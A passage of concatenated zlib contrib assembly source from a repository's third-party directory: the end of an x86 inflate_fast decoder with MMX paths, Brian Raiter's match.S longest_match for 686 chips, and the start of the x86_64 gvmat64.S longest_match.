* %ecx = nbytes, %eax = write, %eax = len
*
* else {
* from += write - nbytes;
* if (nbytes < len) {
* len -= nbytes;
* do {
* PUP(out) = PUP(from);
* } while (--nbytes);
* from = out - dist;
* }
* }
*/
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
movl len(%esp), len_r
cmpl nbytes_r, len_r
jbe .L_do_copy1 /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1:
/* regs: %esi = from, %esi = in, %ebp = hold, %bl = bits, %edi = out
* %eax = len
*
* while (len > 0) {
* PUP(out) = PUP(from);
* len--;
* }
* }
* } while (in < last && out < end);
*/
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
jmp .L_while_test
#undef len_r
#undef dist_r
#endif /* NO_MMX || RUN_TIME_MMX */
/*** MMX code ***/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
.align 32,0x90
.L_init_mmx:
emms
#undef bits_r
#undef bitslong_r
#define bitslong_r %ebp
#define hold_mm %mm0
movd %ebp, hold_mm
movl %ebx, bitslong_r
#define used_mm %mm1
#define dmask2_mm %mm2
#define lmask2_mm %mm3
#define lmask_mm %mm4
#define dmask_mm %mm5
#define tmp_mm %mm6
movd lmask(%esp), lmask_mm
movq lmask_mm, lmask2_mm
movd dmask(%esp), dmask_mm
movq dmask_mm, dmask2_mm
pxor used_mm, used_mm
movl lcode(%esp), %ebx /* ebx = lcode */
jmp .L_do_loop_mmx
.align 32,0x90
.L_while_test_mmx:
/* while (in < last && out < end)
*/
cmpl out_r, end(%esp)
jbe .L_break_loop /* if (out >= end) */
cmpl in_r, last(%esp)
jbe .L_break_loop
.L_do_loop_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_length_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_length_code_mmx:
pand hold_mm, lmask_mm
movd lmask_mm, %eax
movq lmask2_mm, lmask_mm
movl (%ebx,%eax,4), %eax /* eax = lcode[hold & lmask] */
.L_dolen_mmx:
movzbl %ah, %ecx /* ecx = this.bits */
movd %ecx, used_mm
subl %ecx, bitslong_r /* bits -= this.bits */
testb %al, %al
jnz .L_test_for_length_base_mmx /* if (op != 0) 45.7% */
shrl $16, %eax /* output this.val char */
stosb
jmp .L_while_test_mmx
.L_test_for_length_base_mmx:
#define len_r %edx
movl %eax, len_r /* len = this */
shrl $16, len_r /* len = this.val */
testb $16, %al
jz .L_test_for_second_level_length_mmx /* if ((op & 16) == 0) 8% */
andl $15, %eax /* op &= 15 */
jz .L_decode_distance_mmx /* if (!op) */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm
movd hold_mm, %ecx
subl %eax, bitslong_r
andl .L_mask(,%eax,4), %ecx
addl %ecx, len_r /* len += hold & mask[op] */
.L_decode_distance_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
cmpl $32, bitslong_r
ja .L_get_dist_code_mmx /* if (32 < bits) */
movd bitslong_r, tmp_mm
movd (in_r), %mm7
addl $4, in_r
psllq tmp_mm, %mm7
addl $32, bitslong_r
por %mm7, hold_mm /* hold_mm |= *((uint *)in)++ << bits */
.L_get_dist_code_mmx:
movl dcode(%esp), %ebx /* ebx = dcode */
pand hold_mm, dmask_mm
movd dmask_mm, %eax
movq dmask2_mm, dmask_mm
movl (%ebx,%eax,4), %eax /* eax = dcode[hold & lmask] */
.L_dodist_mmx:
#define dist_r %ebx
movzbl %ah, %ecx /* ecx = this.bits */
movl %eax, dist_r
shrl $16, dist_r /* dist = this.val */
subl %ecx, bitslong_r /* bits -= this.bits */
movd %ecx, used_mm
testb $16, %al /* if ((op & 16) == 0) */
jz .L_test_for_second_level_dist_mmx
andl $15, %eax /* op &= 15 */
jz .L_check_dist_one_mmx
.L_add_bits_to_dist_mmx:
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd %eax, used_mm /* save bit length of current op */
movd hold_mm, %ecx /* get the next bits on input stream */
subl %eax, bitslong_r /* bits -= op bits */
andl .L_mask(,%eax,4), %ecx /* ecx = hold & mask[op] */
addl %ecx, dist_r /* dist += hold & mask[op] */
.L_check_window_mmx:
movl in_r, in(%esp) /* save in so from can use it's reg */
movl out_r, %eax
subl beg(%esp), %eax /* nbytes = out - beg */
cmpl dist_r, %eax
jb .L_clip_window_mmx /* if (dist > nbytes) 4.2% */
movl len_r, %ecx
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
subl $3, %ecx
movb (from_r), %al
movb %al, (out_r)
movb 1(from_r), %al
movb 2(from_r), %dl
addl $3, from_r
movb %al, 1(out_r)
movb %dl, 2(out_r)
addl $3, out_r
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_check_dist_one_mmx:
cmpl $1, dist_r
jne .L_check_window_mmx
cmpl out_r, beg(%esp)
je .L_check_window_mmx
decl out_r
movl len_r, %ecx
movb (out_r), %al
subl $3, %ecx
movb %al, 1(out_r)
movb %al, 2(out_r)
movb %al, 3(out_r)
addl $4, out_r
rep stosb
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
.align 16,0x90
.L_test_for_second_level_length_mmx:
testb $64, %al
jnz .L_test_for_end_of_block /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
addl len_r, %ecx
movl (%ebx,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dolen_mmx
.align 16,0x90
.L_test_for_second_level_dist_mmx:
testb $64, %al
jnz .L_invalid_distance_code /* if ((op & 64) != 0) */
andl $15, %eax
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ecx
andl .L_mask(,%eax,4), %ecx
movl dcode(%esp), %eax /* ecx = dcode */
addl dist_r, %ecx
movl (%eax,%ecx,4), %eax /* eax = lcode[hold & lmask] */
jmp .L_dodist_mmx
.align 16,0x90
.L_clip_window_mmx:
#define nbytes_r %ecx
movl %eax, nbytes_r
movl wsize(%esp), %eax /* prepare for dist compare */
negl nbytes_r /* nbytes = -nbytes */
movl window(%esp), from_r /* from = window */
cmpl dist_r, %eax
jb .L_invalid_distance_too_far /* if (dist > wsize) */
addl dist_r, nbytes_r /* nbytes = dist - nbytes */
cmpl $0, write(%esp)
jne .L_wrap_around_window_mmx /* if (write != 0) */
subl nbytes_r, %eax
addl %eax, from_r /* from += wsize - nbytes */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_wrap_around_window_mmx:
#define write_r %eax
movl write(%esp), write_r
cmpl write_r, nbytes_r
jbe .L_contiguous_in_window_mmx /* if (write >= nbytes) */
addl wsize(%esp), from_r
addl write_r, from_r
subl nbytes_r, from_r /* from += wsize + write - nbytes */
subl write_r, nbytes_r /* nbytes -= write */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl window(%esp), from_r /* from = window */
movl write(%esp), nbytes_r /* nbytes = write */
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
jmp .L_do_copy1_mmx
.L_contiguous_in_window_mmx:
#define write_r %eax
addl write_r, from_r
subl nbytes_r, from_r /* from += write - nbytes */
#undef write_r
cmpl nbytes_r, len_r
jbe .L_do_copy1_mmx /* if (nbytes >= len) */
subl nbytes_r, len_r /* len -= nbytes */
rep movsb
movl out_r, from_r
subl dist_r, from_r /* from = out - dist */
.L_do_copy1_mmx:
#undef nbytes_r
#define in_r %esi
movl len_r, %ecx
rep movsb
movl in(%esp), in_r /* move in back to %esi, toss from */
movl lcode(%esp), %ebx /* move lcode back to %ebx, toss dist */
jmp .L_while_test_mmx
#undef hold_r
#undef bitslong_r
#endif /* USE_MMX || RUN_TIME_MMX */
/*** USE_MMX, NO_MMX, and RUNTIME_MMX from here on ***/
.L_invalid_distance_code:
/* else {
* strm->msg = "invalid distance code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_distance_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_test_for_end_of_block:
/* else if (op & 32) {
* state->mode = TYPE;
* break;
* }
*/
testb $32, %al
jz .L_invalid_literal_length_code /* if ((op & 32) == 0) */
movl $0, %ecx
movl $INFLATE_MODE_TYPE, %edx
jmp .L_update_stream_state
.L_invalid_literal_length_code:
/* else {
* strm->msg = "invalid literal/length code";
* state->mode = BAD;
* }
*/
movl $.L_invalid_literal_length_code_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_invalid_distance_too_far:
/* strm->msg = "invalid distance too far back";
* state->mode = BAD;
*/
movl in(%esp), in_r /* from_r has in's reg, put in back */
movl $.L_invalid_distance_too_far_msg, %ecx
movl $INFLATE_MODE_BAD, %edx
jmp .L_update_stream_state
.L_update_stream_state:
/* set strm->msg = %ecx, strm->state->mode = %edx */
movl strm_sp(%esp), %eax
testl %ecx, %ecx /* if (msg != NULL) */
jz .L_skip_msg
movl %ecx, msg_strm(%eax) /* strm->msg = msg */
.L_skip_msg:
movl state_strm(%eax), %eax /* state = strm->state */
movl %edx, mode_state(%eax) /* state->mode = edx (BAD | TYPE) */
jmp .L_break_loop
.align 32,0x90
.L_break_loop:
/*
* Regs:
*
* bits = %ebp when mmx, and in %ebx when non-mmx
* hold = %hold_mm when mmx, and in %ebp when non-mmx
* in = %esi
* out = %edi
*/
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_next_in
#endif /* RUN_TIME_MMX */
movl %ebp, %ebx
.L_update_next_in:
#endif
#define strm_r %eax
#define state_r %edx
/* len = bits >> 3;
* in -= len;
* bits -= len << 3;
* hold &= (1U << bits) - 1;
* state->hold = hold;
* state->bits = bits;
* strm->next_in = in;
* strm->next_out = out;
*/
movl strm_sp(%esp), strm_r
movl %ebx, %ecx
movl state_strm(strm_r), state_r
shrl $3, %ecx
subl %ecx, in_r
shll $3, %ecx
subl %ecx, %ebx
movl out_r, next_out_strm(strm_r)
movl %ebx, bits_state(state_r)
movl %ebx, %ecx
leal buf(%esp), %ebx
cmpl %ebx, last(%esp)
jne .L_buf_not_used /* if buf != last */
subl %ebx, in_r /* in -= buf */
movl next_in_strm(strm_r), %ebx
movl %ebx, last(%esp) /* last = strm->next_in */
addl %ebx, in_r /* in += strm->next_in */
movl avail_in_strm(strm_r), %ebx
subl $11, %ebx
addl %ebx, last(%esp) /* last = &strm->next_in[ avail_in - 11 ] */
.L_buf_not_used:
movl in_r, next_in_strm(strm_r)
movl $1, %ebx
shll %cl, %ebx
decl %ebx
#if defined( USE_MMX ) || defined( RUN_TIME_MMX )
#if defined( RUN_TIME_MMX )
cmpl $DO_USE_MMX, inflate_fast_use_mmx
jne .L_update_hold
#endif /* RUN_TIME_MMX */
psrlq used_mm, hold_mm /* hold_mm >>= last bit length */
movd hold_mm, %ebp
emms
.L_update_hold:
#endif /* USE_MMX || RUN_TIME_MMX */
andl %ebx, %ebp
movl %ebp, hold_state(state_r)
#define last_r %ebx
/* strm->avail_in = in < last ? 11 + (last - in) : 11 - (in - last) */
movl last(%esp), last_r
cmpl in_r, last_r
jbe .L_last_is_smaller /* if (in >= last) */
subl in_r, last_r /* last -= in */
addl $11, last_r /* last += 11 */
movl last_r, avail_in_strm(strm_r)
jmp .L_fixup_out
.L_last_is_smaller:
subl last_r, in_r /* in -= last */
negl in_r /* in = -in */
addl $11, in_r /* in += 11 */
movl in_r, avail_in_strm(strm_r)
#undef last_r
#define end_r %ebx
.L_fixup_out:
/* strm->avail_out = out < end ? 257 + (end - out) : 257 - (out - end)*/
movl end(%esp), end_r
cmpl out_r, end_r
jbe .L_end_is_smaller /* if (out >= end) */
subl out_r, end_r /* end -= out */
addl $257, end_r /* end += 257 */
movl end_r, avail_out_strm(strm_r)
jmp .L_done
.L_end_is_smaller:
subl end_r, out_r /* out -= end */
negl out_r /* out = -out */
addl $257, out_r /* out += 257 */
movl out_r, avail_out_strm(strm_r)
#undef end_r
#undef strm_r
#undef state_r
.L_done:
addl $local_var_size, %esp
popf
popl %ebx
popl %ebp
popl %esi
popl %edi
ret
#if defined( GAS_ELF )
/* elf info */
.type inflate_fast,@function
.size inflate_fast,.-inflate_fast
#endif
|
aiekick/Lumo
| 10,365
|
3rdparty/assimp/contrib/zlib/contrib/asm686/match.S
|
/* match.S -- x86 assembly version of the zlib longest_match() function.
* Optimized for the Intel 686 chips (PPro and later).
*
* Copyright (C) 1998, 2007 Brian Raiter <breadbox@muppetlabs.com>
*
* This software is provided 'as-is', without any express or implied
* warranty. In no event will the author be held liable for any damages
* arising from the use of this software.
*
* Permission is granted to anyone to use this software for any purpose,
* including commercial applications, and to alter it and redistribute it
* freely, subject to the following restrictions:
*
* 1. The origin of this software must not be misrepresented; you must not
* claim that you wrote the original software. If you use this software
* in a product, an acknowledgment in the product documentation would be
* appreciated but is not required.
* 2. Altered source versions must be plainly marked as such, and must not be
* misrepresented as being the original software.
* 3. This notice may not be removed or altered from any source distribution.
*/
#ifndef NO_UNDERLINE
#define match_init _match_init
#define longest_match _longest_match
#endif
#define MAX_MATCH (258)
#define MIN_MATCH (3)
#define MIN_LOOKAHEAD (MAX_MATCH + MIN_MATCH + 1)
#define MAX_MATCH_8 ((MAX_MATCH + 7) & ~7)
/* stack frame offsets */
#define chainlenwmask 0 /* high word: current chain len */
/* low word: s->wmask */
#define window 4 /* local copy of s->window */
#define windowbestlen 8 /* s->window + bestlen */
#define scanstart 16 /* first two bytes of string */
#define scanend 12 /* last two bytes of string */
#define scanalign 20 /* dword-misalignment of string */
#define nicematch 24 /* a good enough match size */
#define bestlen 28 /* size of best match so far */
#define scan 32 /* ptr to string wanting match */
#define LocalVarsSize (36)
/* saved ebx 36 */
/* saved edi 40 */
/* saved esi 44 */
/* saved ebp 48 */
/* return address 52 */
#define deflatestate 56 /* the function arguments */
#define curmatch 60
/* All the +zlib1222add offsets are due to the addition of fields
* in zlib in the deflate_state structure since the asm code was first written
* (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
* (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
* if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
*/
#define zlib1222add (8)
#define dsWSize (36+zlib1222add)
#define dsWMask (44+zlib1222add)
#define dsWindow (48+zlib1222add)
#define dsPrev (56+zlib1222add)
#define dsMatchLen (88+zlib1222add)
#define dsPrevMatch (92+zlib1222add)
#define dsStrStart (100+zlib1222add)
#define dsMatchStart (104+zlib1222add)
#define dsLookahead (108+zlib1222add)
#define dsPrevLen (112+zlib1222add)
#define dsMaxChainLen (116+zlib1222add)
#define dsGoodMatch (132+zlib1222add)
#define dsNiceMatch (136+zlib1222add)
.file "match.S"
.globl match_init, longest_match
.text
/* uInt longest_match(deflate_state *deflatestate, IPos curmatch) */
.cfi_sections .debug_frame
longest_match:
.cfi_startproc
/* Save registers that the compiler may be using, and adjust %esp to */
/* make room for our stack frame. */
pushl %ebp
.cfi_def_cfa_offset 8
.cfi_offset ebp, -8
pushl %edi
.cfi_def_cfa_offset 12
pushl %esi
.cfi_def_cfa_offset 16
pushl %ebx
.cfi_def_cfa_offset 20
subl $LocalVarsSize, %esp
.cfi_def_cfa_offset LocalVarsSize+20
/* Retrieve the function arguments. %ecx will hold cur_match */
/* throughout the entire function. %edx will hold the pointer to the */
/* deflate_state structure during the function's setup (before */
/* entering the main loop). */
movl deflatestate(%esp), %edx
movl curmatch(%esp), %ecx
/* uInt wmask = s->w_mask; */
/* unsigned chain_length = s->max_chain_length; */
/* if (s->prev_length >= s->good_match) { */
/* chain_length >>= 2; */
/* } */
movl dsPrevLen(%edx), %eax
movl dsGoodMatch(%edx), %ebx
cmpl %ebx, %eax
movl dsWMask(%edx), %eax
movl dsMaxChainLen(%edx), %ebx
jl LastMatchGood
shrl $2, %ebx
LastMatchGood:
/* chainlen is decremented once beforehand so that the function can */
/* use the sign flag instead of the zero flag for the exit test. */
/* It is then shifted into the high word, to make room for the wmask */
/* value, which it will always accompany. */
decl %ebx
shll $16, %ebx
orl %eax, %ebx
movl %ebx, chainlenwmask(%esp)
/* if ((uInt)nice_match > s->lookahead) nice_match = s->lookahead; */
movl dsNiceMatch(%edx), %eax
movl dsLookahead(%edx), %ebx
cmpl %eax, %ebx
jl LookaheadLess
movl %eax, %ebx
LookaheadLess: movl %ebx, nicematch(%esp)
/* register Bytef *scan = s->window + s->strstart; */
movl dsWindow(%edx), %esi
movl %esi, window(%esp)
movl dsStrStart(%edx), %ebp
lea (%esi,%ebp), %edi
movl %edi, scan(%esp)
/* Determine how many bytes the scan ptr is off from being */
/* dword-aligned. */
movl %edi, %eax
negl %eax
andl $3, %eax
movl %eax, scanalign(%esp)
/* IPos limit = s->strstart > (IPos)MAX_DIST(s) ? */
/* s->strstart - (IPos)MAX_DIST(s) : NIL; */
movl dsWSize(%edx), %eax
subl $MIN_LOOKAHEAD, %eax
subl %eax, %ebp
jg LimitPositive
xorl %ebp, %ebp
LimitPositive:
/* int best_len = s->prev_length; */
movl dsPrevLen(%edx), %eax
movl %eax, bestlen(%esp)
/* Store the sum of s->window + best_len in %esi locally, and in %esi. */
addl %eax, %esi
movl %esi, windowbestlen(%esp)
/* register ush scan_start = *(ushf*)scan; */
/* register ush scan_end = *(ushf*)(scan+best_len-1); */
/* Posf *prev = s->prev; */
movzwl (%edi), %ebx
movl %ebx, scanstart(%esp)
movzwl -1(%edi,%eax), %ebx
movl %ebx, scanend(%esp)
movl dsPrev(%edx), %edi
/* Jump into the main loop. */
movl chainlenwmask(%esp), %edx
jmp LoopEntry
.balign 16
/* do {
* match = s->window + cur_match;
* if (*(ushf*)(match+best_len-1) != scan_end ||
* *(ushf*)match != scan_start) continue;
* [...]
* } while ((cur_match = prev[cur_match & wmask]) > limit
* && --chain_length != 0);
*
* Here is the inner loop of the function. The function will spend the
* majority of its time in this loop, and majority of that time will
* be spent in the first ten instructions.
*
* Within this loop:
* %ebx = scanend
* %ecx = curmatch
* %edx = chainlenwmask - i.e., ((chainlen << 16) | wmask)
* %esi = windowbestlen - i.e., (window + bestlen)
* %edi = prev
* %ebp = limit
*/
LookupLoop:
andl %edx, %ecx
movzwl (%edi,%ecx,2), %ecx
cmpl %ebp, %ecx
jbe LeaveNow
subl $0x00010000, %edx
js LeaveNow
LoopEntry: movzwl -1(%esi,%ecx), %eax
cmpl %ebx, %eax
jnz LookupLoop
movl window(%esp), %eax
movzwl (%eax,%ecx), %eax
cmpl scanstart(%esp), %eax
jnz LookupLoop
/* Store the current value of chainlen. */
movl %edx, chainlenwmask(%esp)
/* Point %edi to the string under scrutiny, and %esi to the string we */
/* are hoping to match it up with. In actuality, %esi and %edi are */
/* both pointed (MAX_MATCH_8 - scanalign) bytes ahead, and %edx is */
/* initialized to -(MAX_MATCH_8 - scanalign). */
movl window(%esp), %esi
movl scan(%esp), %edi
addl %ecx, %esi
movl scanalign(%esp), %eax
movl $(-MAX_MATCH_8), %edx
lea MAX_MATCH_8(%edi,%eax), %edi
lea MAX_MATCH_8(%esi,%eax), %esi
/* Test the strings for equality, 8 bytes at a time. At the end,
* adjust %edx so that it is offset to the exact byte that mismatched.
*
* We already know at this point that the first three bytes of the
* strings match each other, and they can be safely passed over before
* starting the compare loop. So what this code does is skip over 0-3
* bytes, as much as necessary in order to dword-align the %edi
* pointer. (%esi will still be misaligned three times out of four.)
*
* It should be confessed that this loop usually does not represent
* much of the total running time. Replacing it with a more
* straightforward "rep cmpsb" would not drastically degrade
* performance.
*/
LoopCmps:
movl (%esi,%edx), %eax
xorl (%edi,%edx), %eax
jnz LeaveLoopCmps
movl 4(%esi,%edx), %eax
xorl 4(%edi,%edx), %eax
jnz LeaveLoopCmps4
addl $8, %edx
jnz LoopCmps
jmp LenMaximum
LeaveLoopCmps4: addl $4, %edx
LeaveLoopCmps: testl $0x0000FFFF, %eax
jnz LenLower
addl $2, %edx
shrl $16, %eax
LenLower: subb $1, %al
adcl $0, %edx
/* Calculate the length of the match. If it is longer than MAX_MATCH, */
/* then automatically accept it as the best possible match and leave. */
lea (%edi,%edx), %eax
movl scan(%esp), %edi
subl %edi, %eax
cmpl $MAX_MATCH, %eax
jge LenMaximum
/* If the length of the match is not longer than the best match we */
/* have so far, then forget it and return to the lookup loop. */
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
cmpl %ebx, %eax
jg LongerMatch
movl windowbestlen(%esp), %esi
movl dsPrev(%edx), %edi
movl scanend(%esp), %ebx
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* s->match_start = cur_match; */
/* best_len = len; */
/* if (len >= nice_match) break; */
/* scan_end = *(ushf*)(scan+best_len-1); */
LongerMatch: movl nicematch(%esp), %ebx
movl %eax, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
cmpl %ebx, %eax
jge LeaveNow
movl window(%esp), %esi
addl %eax, %esi
movl %esi, windowbestlen(%esp)
movzwl -1(%edi,%eax), %ebx
movl dsPrev(%edx), %edi
movl %ebx, scanend(%esp)
movl chainlenwmask(%esp), %edx
jmp LookupLoop
/* Accept the current string, with the maximum possible length. */
LenMaximum: movl deflatestate(%esp), %edx
movl $MAX_MATCH, bestlen(%esp)
movl %ecx, dsMatchStart(%edx)
/* if ((uInt)best_len <= s->lookahead) return (uInt)best_len; */
/* return s->lookahead; */
LeaveNow:
movl deflatestate(%esp), %edx
movl bestlen(%esp), %ebx
movl dsLookahead(%edx), %eax
cmpl %eax, %ebx
jg LookaheadRet
movl %ebx, %eax
LookaheadRet:
/* Restore the stack and return from whence we came. */
addl $LocalVarsSize, %esp
.cfi_def_cfa_offset 20
popl %ebx
.cfi_def_cfa_offset 16
popl %esi
.cfi_def_cfa_offset 12
popl %edi
.cfi_def_cfa_offset 8
popl %ebp
.cfi_def_cfa_offset 4
.cfi_endproc
match_init: ret
|
aiekick/Lumo
| 15,839
|
3rdparty/assimp/contrib/zlib/contrib/gcc_gvmat64/gvmat64.S
|
/*
;uInt longest_match_x64(
; deflate_state *s,
; IPos cur_match); // current match
; gvmat64.S -- Asm portion of the optimized longest_match for 32 bits x86_64
; (AMD64 on Athlon 64, Opteron, Phenom
; and Intel EM64T on Pentium 4 with EM64T, Pentium D, Core 2 Duo, Core I5/I7)
; this file is translation from gvmat64.asm to GCC 4.x (for Linux, Mac XCode)
; Copyright (C) 1995-2010 Jean-loup Gailly, Brian Raiter and Gilles Vollant.
;
; File written by Gilles Vollant, by converting to assembly the longest_match
; from Jean-loup Gailly in deflate.c of zLib and infoZip zip.
; and by taking inspiration on asm686 with masm, optimised assembly code
; from Brian Raiter, written 1998
;
; This software is provided 'as-is', without any express or implied
; warranty. In no event will the authors be held liable for any damages
; arising from the use of this software.
;
; Permission is granted to anyone to use this software for any purpose,
; including commercial applications, and to alter it and redistribute it
; freely, subject to the following restrictions:
;
; 1. The origin of this software must not be misrepresented; you must not
; claim that you wrote the original software. If you use this software
; in a product, an acknowledgment in the product documentation would be
; appreciated but is not required.
; 2. Altered source versions must be plainly marked as such, and must not be
; misrepresented as being the original software
; 3. This notice may not be removed or altered from any source distribution.
;
; http://www.zlib.net
; http://www.winimage.com/zLibDll
; http://www.muppetlabs.com/~breadbox/software/assembly.html
;
; to compile this file for zLib, I use option:
; gcc -c -arch x86_64 gvmat64.S
;uInt longest_match(s, cur_match)
; deflate_state *s;
; IPos cur_match; // current match /
;
; with XCode for Mac, I had strange error with some jump on intel syntax
; this is why BEFORE_JMP and AFTER_JMP are used
*/
#define BEFORE_JMP .att_syntax
#define AFTER_JMP .intel_syntax noprefix
#ifndef NO_UNDERLINE
# define match_init _match_init
# define longest_match _longest_match
#endif
.intel_syntax noprefix
.globl match_init, longest_match
.text
longest_match:
#define LocalVarsSize 96
/*
; register used : rax,rbx,rcx,rdx,rsi,rdi,r8,r9,r10,r11,r12
; free register : r14,r15
; register can be saved : rsp
*/
#define chainlenwmask (rsp + 8 - LocalVarsSize)
#define nicematch (rsp + 16 - LocalVarsSize)
#define save_rdi (rsp + 24 - LocalVarsSize)
#define save_rsi (rsp + 32 - LocalVarsSize)
#define save_rbx (rsp + 40 - LocalVarsSize)
#define save_rbp (rsp + 48 - LocalVarsSize)
#define save_r12 (rsp + 56 - LocalVarsSize)
#define save_r13 (rsp + 64 - LocalVarsSize)
#define save_r14 (rsp + 72 - LocalVarsSize)
#define save_r15 (rsp + 80 - LocalVarsSize)
/*
; all the +4 offsets are due to the addition of pending_buf_size (in zlib
; in the deflate_state structure since the asm code was first written
; (if you compile with zlib 1.0.4 or older, remove the +4).
; Note : these value are good with a 8 bytes boundary pack structure
*/
#define MAX_MATCH 258
#define MIN_MATCH 3
#define MIN_LOOKAHEAD (MAX_MATCH+MIN_MATCH+1)
/*
;;; Offsets for fields in the deflate_state structure. These numbers
;;; are calculated from the definition of deflate_state, with the
;;; assumption that the compiler will dword-align the fields. (Thus,
;;; changing the definition of deflate_state could easily cause this
;;; program to crash horribly, without so much as a warning at
;;; compile time. Sigh.)
; all the +zlib1222add offsets are due to the addition of fields
; in zlib in the deflate_state structure since the asm code was first written
; (if you compile with zlib 1.0.4 or older, use "zlib1222add equ (-4)").
; (if you compile with zlib between 1.0.5 and 1.2.2.1, use "zlib1222add equ 0").
; if you compile with zlib 1.2.2.2 or later , use "zlib1222add equ 8").
*/
/* you can check the structure offset by running
#include <stdlib.h>
#include <stdio.h>
#include "deflate.h"
void print_depl()
{
deflate_state ds;
deflate_state *s=&ds;
printf("size pointer=%u\n",(int)sizeof(void*));
printf("#define dsWSize %u\n",(int)(((char*)&(s->w_size))-((char*)s)));
printf("#define dsWMask %u\n",(int)(((char*)&(s->w_mask))-((char*)s)));
printf("#define dsWindow %u\n",(int)(((char*)&(s->window))-((char*)s)));
printf("#define dsPrev %u\n",(int)(((char*)&(s->prev))-((char*)s)));
printf("#define dsMatchLen %u\n",(int)(((char*)&(s->match_length))-((char*)s)));
printf("#define dsPrevMatch %u\n",(int)(((char*)&(s->prev_match))-((char*)s)));
printf("#define dsStrStart %u\n",(int)(((char*)&(s->strstart))-((char*)s)));
printf("#define dsMatchStart %u\n",(int)(((char*)&(s->match_start))-((char*)s)));
printf("#define dsLookahead %u\n",(int)(((char*)&(s->lookahead))-((char*)s)));
printf("#define dsPrevLen %u\n",(int)(((char*)&(s->prev_length))-((char*)s)));
printf("#define dsMaxChainLen %u\n",(int)(((char*)&(s->max_chain_length))-((char*)s)));
printf("#define dsGoodMatch %u\n",(int)(((char*)&(s->good_match))-((char*)s)));
printf("#define dsNiceMatch %u\n",(int)(((char*)&(s->nice_match))-((char*)s)));
}
*/
#define dsWSize 68
#define dsWMask 76
#define dsWindow 80
#define dsPrev 96
#define dsMatchLen 144
#define dsPrevMatch 148
#define dsStrStart 156
#define dsMatchStart 160
#define dsLookahead 164
#define dsPrevLen 168
#define dsMaxChainLen 172
#define dsGoodMatch 188
#define dsNiceMatch 192
#define window_size [ rcx + dsWSize]
#define WMask [ rcx + dsWMask]
#define window_ad [ rcx + dsWindow]
#define prev_ad [ rcx + dsPrev]
#define strstart [ rcx + dsStrStart]
#define match_start [ rcx + dsMatchStart]
#define Lookahead [ rcx + dsLookahead] //; 0ffffffffh on infozip
#define prev_length [ rcx + dsPrevLen]
#define max_chain_length [ rcx + dsMaxChainLen]
#define good_match [ rcx + dsGoodMatch]
#define nice_match [ rcx + dsNiceMatch]
/*
; windows:
; parameter 1 in rcx(deflate state s), param 2 in rdx (cur match)
; see http://weblogs.asp.net/oldnewthing/archive/2004/01/14/58579.aspx and
; http://msdn.microsoft.com/library/en-us/kmarch/hh/kmarch/64bitAMD_8e951dd2-ee77-4728-8702-55ce4b5dd24a.xml.asp
;
; All registers must be preserved across the call, except for
; rax, rcx, rdx, r8, r9, r10, and r11, which are scratch.
;
; gcc on macosx-linux:
; see http://www.x86-64.org/documentation/abi-0.99.pdf
; param 1 in rdi, param 2 in rsi
; rbx, rsp, rbp, r12 to r15 must be preserved
;;; Save registers that the compiler may be using, and adjust esp to
;;; make room for our stack frame.
;;; Retrieve the function arguments. r8d will hold cur_match
;;; throughout the entire function. edx will hold the pointer to the
;;; deflate_state structure during the function's setup (before
;;; entering the main loop.
; ms: parameter 1 in rcx (deflate_state* s), param 2 in edx -> r8 (cur match)
; mac: param 1 in rdi, param 2 rsi
; this clear high 32 bits of r8, which can be garbage in both r8 and rdx
*/
mov [save_rbx],rbx
mov [save_rbp],rbp
mov rcx,rdi
mov r8d,esi
mov [save_r12],r12
